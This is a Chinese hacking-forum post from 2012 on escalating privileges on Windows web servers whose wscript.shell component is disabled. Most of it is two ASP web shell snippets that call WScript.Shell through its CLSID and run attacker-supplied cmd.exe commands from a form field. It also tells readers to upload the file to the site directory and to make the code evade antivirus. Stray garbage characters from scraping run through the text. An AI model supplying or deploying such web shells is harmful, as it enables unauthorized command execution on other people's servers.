找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2488|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。, I6 T$ f" {6 _9 n- M1 F1 }: J
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
      U7 @/ W5 N8 N7 i
  • 要想让运行命令可以试试这种方法,成功率为五五之数。6 t: `! W, v0 G$ g- f/ E
  • 把下面代码复制:
    " c; q# H. U* K: Y2 y; v
  • <%" E; ?/ Z6 o3 y4 d; ]# M2 B
  • end if8 h/ s# D+ a' m
  • response.write(”")) a" J" k$ h7 T" k1 m% P
  • On Error Resume
    8 J3 D# a; x  k
  • Next; R6 R# R  B  ]3 s
  • response.write oScriptlhn.exec(”cmd.exe /c” & ) m; V5 p9 }$ T; L) n0 z
  • request(”c”)).stdout.readall! a( ?/ u8 S( c* z% e5 }! q
  • response.write(”")
    + L+ t' B5 C2 e, r" N2 a- U' X
  • response.write(”")9 n- y& Q& v9 o, |) |0 D0 V8 M7 F$ C
  • response.write(”/ P2 _3 \* z: e9 d# X
  • “)1 U6 _/ g( U$ E2 b" N- i
  • response.write(”")( a% J9 \9 ~. p( Z. Z
  • %>8 t" K5 G* A% A% A* {% r0 `4 A
  • 保存为一个asp文件,然后传到网站目录上去( o6 f7 J" U: q, `7 P
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。$ i9 k8 S+ R1 G* g1 t
  • 我用此成功运行过cacls命令。& f/ K4 J5 W( R7 @7 `, u: c
  • 第二那就是运行时出错,可能限制某些代码执行3 N! C! y0 G# C6 v" L6 R
  • 无wscript.shell组件提权又一个方法
    + A/ l6 v3 C' C' B2 `! ^
  • <object runat=server id=oScriptlhn scope=page 9 W: [) k  E$ w: `& O' Z9 c* ?

  • 1 C& M5 i+ Y* c6 y
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>7 y% r: _4 ]$ n' e4 O/ l
  • <%if err then%>
    5 y7 g1 \: U3 f& ]5 A4 `* o5 [
  • <object runat=server id=oScriptlhn scope=page
    6 Y; M) n: A) x& s9 O$ g

  • 2 j5 U& w2 ?# u2 I6 d: ?& x  f
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
    0 v% |; y! H) a: h4 R
  • <%
    6 N) ?  H, O! c$ ]
  • end if " f5 l& m$ S1 X
  • response.write(”<textarea readonly cols=80
    . v6 C# n8 H5 J% F
  • / i" @5 w9 U3 M& O0 p
  • rows=20>”)
    / W* m! u. c8 F3 i
  • On Error Resume Next
      P+ w  r* g( ~% ]) w% G
  • response.write
    ' w$ G3 h! U9 K- u+ Q2 j( Y
  • ! {. l9 c$ s6 Z  P8 @% g
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall, ]$ V% O8 m0 v' J% A$ F
  • response.write(”</textarea>”) * q: C, D- }8 J# S& V1 w
  • response.write(”<form 1 n) I) v5 r. Y% `* D2 E. }
  • , |$ u5 F* M' w- f  t( z* h- I
  • method=’post’>”)
    / V1 z3 O& X9 C+ n* U" G5 n
  • response.write(”<input type=text name=’c' 2 r  i6 h# ^! {

  • ! s6 ?& a6 U* W4 z9 U
  • size=60><br>”) 2 ^' t6 k% p# m
  • response.write(”<input type=submit
    0 Z% {6 A; v& n9 z8 R

  • ; @* e. b/ y, h' O3 y9 @
  • value=’执行’></form>”)
    9 c6 C' V% D5 h1 T
  • %>" p4 f4 \! P3 Y; Q9 U) y
  • 保存为ASP,此代码可能被杀,请注意免杀。2 j7 f5 L2 }8 Q2 h3 a! k
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
    7 P; u9 \+ A5 V& O
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表